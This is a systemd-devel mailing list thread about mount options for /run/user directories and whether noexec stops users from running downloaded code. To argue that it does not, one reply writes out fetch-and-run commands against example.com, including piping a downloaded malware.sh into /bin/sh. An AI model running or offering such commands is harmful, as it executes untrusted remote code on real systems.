Re: [systemd-devel] Mount options of /var/run/users/pid
Thanks for all. I solve my problem with pam_exec for /etc/pam.d/login, /etc/pam.d/gdm-password by adding: session require pam_exec.so /sbin/resources /sbin/resources: #!/bin/bash mount $XDG_RUNTIME_DIR -o remount,noexec I mean this tread closed. ___ systemd-devel mailing list systemd-devel@lists.freedesktop.org http://lists.freedesktop.org/mailman/listinfo/systemd-devel
Re: [systemd-devel] Mount options of /var/run/users/pid
On Mon, 16.02.15 22:14, Павел Самсонов (pvsamsono...@gmail.com) wrote: If I have multiuser Linux installation with shell and DE access, my users have not places in system, where they able download something from internet and execute: / ro,exec /home rw,noexec /var rw,noexec All tmpfs noexec In Debian wheezy this done and work. In Debian jessie I have places (/run/users/*), where users may execute dowloaded executables. What I must do with this? As mentioned already. We do not support mounting /run/user/* with other mount options, and this is unlikely to hange. WHat you are trying to do does not provide any security (as discussed in this thread otherwise), and thus this is something we are unlikely to consider to support. Sorry, Lennart -- Lennart Poettering, Red Hat ___ systemd-devel mailing list systemd-devel@lists.freedesktop.org http://lists.freedesktop.org/mailman/listinfo/systemd-devel
Re: [systemd-devel] Mount options of /var/run/users/pid
On 16/02/15 18:14, Павел Самсонов wrote: If I have multiuser Linux installation with shell and DE access, my users have not places in system, where they able download something from internet and execute: ... /home rw,noexec noexec is not sufficient to do what you have said. For instance, your users could do any of these: wget http://example.com/malware.sh /bin/sh malware.sh wget -O - http://example.com/malware.sh | /bin/sh wget http://example.com/malware.x86.bin /lib/ld-linux.so.2 malware.x86.bin (Or replace /bin/sh with Python, Perl etc., or the x86 executable with any architecture your machine can run.) Users who can execute arbitrary code with their own privileges, and obtain arbitrary files from the Internet, can execute arbitrary code from the Internet with their own privileges. You are unlikely to be able to avoid this without LSMs. If you use an LSM (AppArmor, SELinux, etc.) and confine your users, you might be able to achieve what you think you have already achieved. -- Simon McVittie Collabora Ltd. http://www.collabora.com/ ___ systemd-devel mailing list systemd-devel@lists.freedesktop.org http://lists.freedesktop.org/mailman/listinfo/systemd-devel
Re: [systemd-devel] Mount options of /var/run/users/pid
Am 16.02.2015 um 21:02 schrieb Mantas Mikulėnas: On Mon, Feb 16, 2015 at 9:40 PM, Reindl Harald wrote: Am 16.02.2015 um 20:31 schrieb Mantas Mikulėnas: On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie wrote: wget http://example.com/malware.x86.bin http://example.com/malware.__x86.bin http://example.com/malware.__x86.bin http://example.com/malware.x86.bin /lib/ld-linux.so.2 malware.x86.bin Pretty sure this no longer works; these days noexec prevents mmap(PROT_EXEC) as well you should not assume when you can try it simple [...] [root@arrakis:~]$ bash /Volumes/dune/test.sh config-3.18.7-100.fc20.x86_64 grub2 initramfs-3.18.7-100.fc20.x86___64.img initrd-plymouth.img lost+found System.map-3.18.7-100.fc20.__x86_64 vmlinuz-3.18.7-100.fc20.x86_64 And you should not reply before you read the actual post, in which I specifically reply to a comment about ld-linux.so – not script interpreters, which don't rely on this function the context was about can you prevent a user from execute something with noexec and fact is you can't - period likely you missed the wget -O - http://example.com/malware.sh | /bin/sh in the post explaining it it's the part you stripped from your quote (maybe not post HTML would have kept it readbale) signature.asc Description: OpenPGP digital signature ___ systemd-devel mailing list systemd-devel@lists.freedesktop.org http://lists.freedesktop.org/mailman/listinfo/systemd-devel
Re: [systemd-devel] Mount options of /var/run/users/pid
Am 16.02.2015 um 20:31 schrieb Mantas Mikulėnas: On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie simon.mcvit...@collabora.co.uk mailto:simon.mcvit...@collabora.co.uk wrote: wget http://example.com/malware.__x86.bin http://example.com/malware.x86.bin /lib/ld-linux.so.2 malware.x86.bin Pretty sure this no longer works; these days noexec prevents mmap(PROT_EXEC) as well you should not assume when you can try it simple frankly we mount most data-partitions noexec even if they contain cronjobs which get the full interpreter and the script path by intention [root@arrakis:~]$ mount | grep dune /dev/sdf1 on /Volumes/dune type ext4 (rw,noexec,noatime,nodiratime,commit=30,inode_readahead_blks=16) [root@arrakis:~]$ touch /Volumes/dune/test.sh [root@arrakis:~]$ echo ls /boot/ /Volumes/dune/test.sh [root@arrakis:~]$ bash /Volumes/dune/test.sh config-3.18.7-100.fc20.x86_64 grub2 initramfs-3.18.7-100.fc20.x86_64.img initrd-plymouth.img lost+found System.map-3.18.7-100.fc20.x86_64 vmlinuz-3.18.7-100.fc20.x86_64 signature.asc Description: OpenPGP digital signature ___ systemd-devel mailing list systemd-devel@lists.freedesktop.org http://lists.freedesktop.org/mailman/listinfo/systemd-devel
Re: [systemd-devel] Mount options of /var/run/users/pid
If I have multiuser Linux installation with shell and DE access, my users have not places in system, where they able download something from internet and execute: / ro,exec /home rw,noexec /var rw,noexec All tmpfs noexec In Debian wheezy this done and work. In Debian jessie I have places (/run/users/*), where users may execute dowloaded executables. What I must do with this? Sorry my english. 16.02.2015 14:10 пользователь Lennart Poettering lenn...@poettering.net написал: B1;3802;0cOn Sun, 15.02.15 16:31, Павел Самсонов (pvsamsono...@gmail.com) wrote: Good day, I see a new Debian jessie, and I mean, that /var/run/pid filesystems must be mounted with noexec options, so thay have user write access. On some installations this very important. Were I may configure this, or may be You change your default mount options? Sorry my English, best regards, Pavel, Russia. I cannot parse this. Do you mean /run/user/uid? /var/run/pid is not a separate mount, /run is, and that is not user writable. The /run/user/uid directory is mounted to implement XDG_RUNTIME_DIR. We guarantee certain functionality on it, including the ability to have executable files there, and that's specified in the XDG_RUNTIME_DIR spec. Hence, the only way to change it is by patching logind, and we will not add a configuration option for this, since it would mean XDG_RUNTIME_DIR would not provide what it's supposed to provide anymore. Note though that /run/user/uid is mounted as per-user tmpfs instance, with nosuid and nodev, and a size limit applied. It should hence be a pretty safe thing. Also note that noexec doesn't really do what people think it does. Lennart -- Lennart Poettering, Red Hat ___ systemd-devel mailing list systemd-devel@lists.freedesktop.org http://lists.freedesktop.org/mailman/listinfo/systemd-devel
Re: [systemd-devel] Mount options of /var/run/users/pid
On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie simon.mcvit...@collabora.co.uk wrote: wget http://example.com/malware.x86.bin /lib/ld-linux.so.2 malware.x86.bin Pretty sure this no longer works; these days noexec prevents mmap(PROT_EXEC) as well. -- Mantas Mikulėnas graw...@gmail.com ___ systemd-devel mailing list systemd-devel@lists.freedesktop.org http://lists.freedesktop.org/mailman/listinfo/systemd-devel
Re: [systemd-devel] Mount options of /var/run/users/pid
B1;3802;0cOn Sun, 15.02.15 16:31, Павел Самсонов (pvsamsono...@gmail.com) wrote: Good day, I see a new Debian jessie, and I mean, that /var/run/pid filesystems must be mounted with noexec options, so thay have user write access. On some installations this very important. Were I may configure this, or may be You change your default mount options? Sorry my English, best regards, Pavel, Russia. I cannot parse this. Do you mean /run/user/uid? /var/run/pid is not a separate mount, /run is, and that is not user writable. The /run/user/uid directory is mounted to implement XDG_RUNTIME_DIR. We guarantee certain functionality on it, including the ability to have executable files there, and that's specified in the XDG_RUNTIME_DIR spec. Hence, the only way to change it is by patching logind, and we will not add a configuration option for this, since it would mean XDG_RUNTIME_DIR would not provide what it's supposed to provide anymore. Note though that /run/user/uid is mounted as per-user tmpfs instance, with nosuid and nodev, and a size limit applied. It should hence be a pretty safe thing. Also note that noexec doesn't really do what people think it does. Lennart -- Lennart Poettering, Red Hat ___ systemd-devel mailing list systemd-devel@lists.freedesktop.org http://lists.freedesktop.org/mailman/listinfo/systemd-devel
Re: [systemd-devel] Mount options of /var/run/users/pid
Am 15.02.2015 um 13:31 schrieb Павел Самсонов: Good day, I see a new Debian jessie, and I mean, that /var/run/pid filesystems must be mounted with noexec options, so thay have user write access. On some installations this very important. Were I may configure this, or may be You change your default mount options? Sorry my English, best regards, Pavel, Russia in case of services you should consider ProtectSystem and ProtectHome which makes /run/user completly inaccessible normally the serivce itself has no business to mangle around there ProtectSystem= Takes a boolean argument or full. If true, mounts the /usr directory read-only for processes invoked by this unit. If set to full, the /etc directory is mounted read-only, too. This setting ensures that any modification of the vendor supplied operating system (and optionally its configuration) is prohibited for the service. It is recommended to enable this setting for all long-running services, unless they are involved with system updates or need to modify the operating system in other ways. Note however that processes retaining the CAP_SYS_ADMIN capability can undo the effect of this setting. This setting is hence particularly useful for daemons which have this capability removed, for example with CapabilityBoundingSet=. Defaults to off. ProtectHome= Takes a boolean argument or read-only. If true, the directories /home and /run/user are made inaccessible and empty for processes invoked by this unit. If set to read-only, the two directories are made read-only instead. It is recommended to enable this setting for all long-running services (in particular network-facing ones), to ensure they cannot get access to private user data, unless the services actually require access to the user's private data. Note however that processes retaining the CAP_SYS_ADMIN capability can undo the effect of this setting. This setting is hence particularly useful for daemons which have this capability removed, for example with CapabilityBoundingSet=. Defaults to off. signature.asc Description: OpenPGP digital signature ___ systemd-devel mailing list systemd-devel@lists.freedesktop.org http://lists.freedesktop.org/mailman/listinfo/systemd-devel
Re: [systemd-devel] Mount options of /var/run/users/pid
On Sun, Feb 15, 2015 at 04:31:24PM +0400, Павел Самсонов wrote: Good day, I see a new Debian jessie, and I mean, that /var/run/pid filesystems must be mounted with noexec options, so thay have user write access. On some installations this very important. Were I may configure this, or may be You change your default mount options? Sorry my English, best regards, Pavel, Russia. No, I don't think this can be configured anywhere, since the options are specified somewhere in systemd code. Maybe the options should be changed to be more restricitive. Zbyszek ___ systemd-devel mailing list systemd-devel@lists.freedesktop.org http://lists.freedesktop.org/mailman/listinfo/systemd-devel